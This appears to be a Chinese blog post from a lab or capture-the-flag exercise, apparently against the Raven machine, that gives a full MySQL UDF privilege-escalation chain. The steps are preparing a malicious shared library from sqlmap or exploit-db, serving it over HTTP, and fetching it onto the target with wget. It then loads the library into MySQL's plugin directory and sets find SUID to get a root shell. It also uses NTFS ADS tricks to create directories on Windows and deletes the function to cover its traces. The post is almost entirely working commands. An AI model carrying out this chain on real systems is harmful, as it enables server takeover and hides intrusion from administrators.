vlambda博客
学习文章列表

 # 获取MySQL安装路径 select @basedir; # 查看是否可以提权 show global variales like "%secure%"; # 获取plugin路径 select @@plugin_dir;

 # 异或解码，得到可用的so文件（Windows是so文件） $ python3 /usr/share/sqlmap/extra/cloak/cloak.py -d -i /usr/share/sqlmap/data/udf/mysql/linux/64/lib_mysqludf_sys.so_ # 把文件复制出来，改个名字 $ cd /root $ cp /usr/share/sqlmap/data/udf/mysql/linux/64/lib_mysqludf_sys.so /root $ mv lib_mysqludf_sys.so exp.so # 挂到本机8000端口上 $ python3 -m http.server 8000

 # 搜索exp $ searchsploit mysql udf # copy到当前目录 $ cp /usr/share/exploitdb/exploits/linux/local/1518.c . # -c: 编译为二进制so文件，-g：生成调试信息 $ gcc -g -c 1518.c # -shared：创建一个动态链接库，-o：输出文件名，-lc：-l 库 c库名 $ gcc -g -shared -o exp.so 1518.o -lc # 挂到本机8000端口上 $ python3 -m http.server 8000

 # 查找到mysql的目录 mysql> select @@basedir; # lib\plugin\目录如果不存在，可以利用NTFS ADS创建lib目录 select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.6\\lib::$INDEX_ALLOCATION'; # 利用NTFS ADS创建plugin目录 select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.6\\lib\\plugin::$INDEX_ALLOCATION'

# 切换到/tmp目录（服务器目录太显眼） $ cd /tmp # 在/tmp目录下载exp.so $ wget 192.168.17.129:8000/exp.so # 登录mysql $ mysql -uroot -pR@v3nSecurity # 使用mysql数据库 mysql> use mysql; # 创建表myfunc mysql> create table myfunc(line blob); # 插入数据 mysql> insert into myfunc values(load_file('/tmp/exp.so')); # 把文件导出到plugin mysql> select * from myfunc into dumpfile '/usr/lib/mysql/plugin/exp.so'; # 创建自定义函数（这里是exp-db版本，如果是使用sqlmap的udf文件，则函数名do_system改为sys_exec，如果是sqlmap-Windows版的那就是cmdshell） mysql> create function do_system returns integer soname 'exp.so'; # 检查是否创建成功 mysql> select * from mysql.func; # 调用do_system函数赋予find目录suid权限，再进行suid提权（DC系列靶机文章中有介绍） mysql> select do_system('chmod u+s /usr/bin/find'); # 清除痕迹 mysql> delete from mysql.func where name='do_system'; # 退出mysql mysql> quit; # SUID：find提权 $ find . -exec /bin/sh \; # 提权成功 $ whoami root